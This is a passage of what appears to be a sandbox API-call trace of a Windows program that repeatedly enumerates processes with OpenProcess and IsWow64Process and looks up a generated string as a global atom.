	[0112.254] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.254] CloseHandle (hObject=0x424) returned 1
	[0112.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x424
	[0112.254] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.254] CloseHandle (hObject=0x424) returned 1
	[0112.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x424
	[0112.254] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.254] CloseHandle (hObject=0x424) returned 1
	[0112.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x424
	[0112.255] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.255] CloseHandle (hObject=0x424) returned 1
	[0112.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x424
	[0112.255] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.255] CloseHandle (hObject=0x424) returned 1
	[0112.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x424
	[0112.255] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.255] CloseHandle (hObject=0x424) returned 1
	[0112.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0112.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x424
	[0112.255] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.255] CloseHandle (hObject=0x424) returned 1
	[0112.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x424
	[0112.256] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.256] CloseHandle (hObject=0x424) returned 1
	[0112.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x424
	[0112.256] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.256] CloseHandle (hObject=0x424) returned 1
	[0112.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x424
	[0112.256] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.256] CloseHandle (hObject=0x424) returned 1
	[0112.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x424
	[0112.256] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.256] CloseHandle (hObject=0x424) returned 1
	[0112.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x424
	[0112.257] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.257] CloseHandle (hObject=0x424) returned 1
	[0112.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x424
	[0112.257] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.257] CloseHandle (hObject=0x424) returned 1
	[0112.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x424
	[0112.257] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.257] CloseHandle (hObject=0x424) returned 1
	[0112.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x424
	[0112.257] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.257] CloseHandle (hObject=0x424) returned 1
	[0112.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x424
	[0112.257] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.258] CloseHandle (hObject=0x424) returned 1
	[0112.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x424
	[0112.258] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.258] CloseHandle (hObject=0x424) returned 1
	[0112.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x424
	[0112.258] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.258] CloseHandle (hObject=0x424) returned 1
	[0112.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x424
	[0112.258] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.258] CloseHandle (hObject=0x424) returned 1
	[0112.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x424
	[0112.259] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.259] CloseHandle (hObject=0x424) returned 1
	[0112.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x424
	[0112.259] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.259] CloseHandle (hObject=0x424) returned 1
	[0112.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x424
	[0112.259] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.259] CloseHandle (hObject=0x424) returned 1
	[0112.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x424
	[0112.259] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.259] CloseHandle (hObject=0x424) returned 1
	[0112.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x424
	[0112.259] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.259] CloseHandle (hObject=0x424) returned 1
	[0112.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x424
	[0112.260] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.260] CloseHandle (hObject=0x424) returned 1
	[0112.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x424
	[0112.260] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.260] CloseHandle (hObject=0x424) returned 1
	[0112.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x424
	[0112.260] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.260] CloseHandle (hObject=0x424) returned 1
	[0112.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x424
	[0112.260] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.260] CloseHandle (hObject=0x424) returned 1
	[0112.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x424
	[0112.260] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.260] CloseHandle (hObject=0x424) returned 1
	[0112.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x424
	[0112.261] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0112.261] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0112.261] GetProcessTimes (in: hProcess=0x424, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0112.262] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0112.262] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0112.262] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0112.262] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0112.263] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0112.263] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0112.263] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0112.387] CloseHandle (hObject=0x424) returned 1
	[0112.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0112.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x424
	[0112.387] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.387] CloseHandle (hObject=0x424) returned 1
	[0112.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x424
	[0112.387] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.387] CloseHandle (hObject=0x424) returned 1
	[0112.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x424
	[0112.388] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.388] CloseHandle (hObject=0x424) returned 1
	[0112.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0112.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0112.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0112.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0112.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0112.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0112.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0112.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0112.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0112.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0112.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0112.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0112.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0112.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0112.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0112.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0112.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0112.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0112.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0112.433] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.433] CloseHandle (hObject=0x690) returned 1
	[0112.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0112.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0112.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0112.434] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.434] CloseHandle (hObject=0x690) returned 1
	[0112.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0112.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0112.434] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.434] CloseHandle (hObject=0x690) returned 1
	[0112.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0112.434] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.434] CloseHandle (hObject=0x690) returned 1
	[0112.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0112.435] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.435] CloseHandle (hObject=0x690) returned 1
	[0112.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0112.435] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.435] CloseHandle (hObject=0x690) returned 1
	[0112.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0112.435] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.435] CloseHandle (hObject=0x690) returned 1
	[0112.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0112.435] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.435] CloseHandle (hObject=0x690) returned 1
	[0112.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0112.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0112.436] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.436] CloseHandle (hObject=0x690) returned 1
	[0112.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0112.436] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.436] CloseHandle (hObject=0x690) returned 1
	[0112.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0112.436] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.436] CloseHandle (hObject=0x690) returned 1
	[0112.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0112.436] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.436] CloseHandle (hObject=0x690) returned 1
	[0112.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0112.437] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.437] CloseHandle (hObject=0x690) returned 1
	[0112.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0112.437] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.437] CloseHandle (hObject=0x690) returned 1
	[0112.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0112.437] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.437] CloseHandle (hObject=0x690) returned 1
	[0112.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0112.437] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.437] CloseHandle (hObject=0x690) returned 1
	[0112.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0112.437] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.437] CloseHandle (hObject=0x690) returned 1
	[0112.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0112.438] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.438] CloseHandle (hObject=0x690) returned 1
	[0112.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0112.438] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.438] CloseHandle (hObject=0x690) returned 1
	[0112.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0112.438] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.438] CloseHandle (hObject=0x690) returned 1
	[0112.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0112.438] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.438] CloseHandle (hObject=0x690) returned 1
	[0112.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0112.438] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.438] CloseHandle (hObject=0x690) returned 1
	[0112.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0112.439] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.439] CloseHandle (hObject=0x690) returned 1
	[0112.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0112.439] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.439] CloseHandle (hObject=0x690) returned 1
	[0112.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0112.439] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.439] CloseHandle (hObject=0x690) returned 1
	[0112.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0112.439] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.439] CloseHandle (hObject=0x690) returned 1
	[0112.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0112.439] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.440] CloseHandle (hObject=0x690) returned 1
	[0112.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0112.440] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.440] CloseHandle (hObject=0x690) returned 1
	[0112.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0112.440] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.440] CloseHandle (hObject=0x690) returned 1
	[0112.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0112.440] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.440] CloseHandle (hObject=0x690) returned 1
	[0112.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0112.440] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.440] CloseHandle (hObject=0x690) returned 1
	[0112.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0112.441] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0112.441] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0112.441] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0112.441] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0112.442] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0112.442] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0112.442] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0112.442] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0112.442] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0112.442] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0112.443] CloseHandle (hObject=0x690) returned 1
	[0112.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0112.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0112.443] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.443] CloseHandle (hObject=0x690) returned 1
	[0112.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0112.443] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.443] CloseHandle (hObject=0x690) returned 1
	[0112.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x690
	[0112.443] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.443] CloseHandle (hObject=0x690) returned 1
	[0112.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0112.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0112.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0112.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0112.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0112.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0112.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0112.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0112.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0112.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0112.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0112.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0112.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0112.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0112.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0112.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0112.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0112.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0112.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0112.656] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.656] CloseHandle (hObject=0x690) returned 1
	[0112.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0112.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0112.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0112.656] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.656] CloseHandle (hObject=0x690) returned 1
	[0112.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0112.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0112.657] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.657] CloseHandle (hObject=0x690) returned 1
	[0112.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0112.657] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.657] CloseHandle (hObject=0x690) returned 1
	[0112.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0112.657] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.657] CloseHandle (hObject=0x690) returned 1
	[0112.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0112.657] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.657] CloseHandle (hObject=0x690) returned 1
	[0112.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0112.658] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.658] CloseHandle (hObject=0x690) returned 1
	[0112.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0112.658] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.658] CloseHandle (hObject=0x690) returned 1
	[0112.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0112.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0112.658] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.658] CloseHandle (hObject=0x690) returned 1
	[0112.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
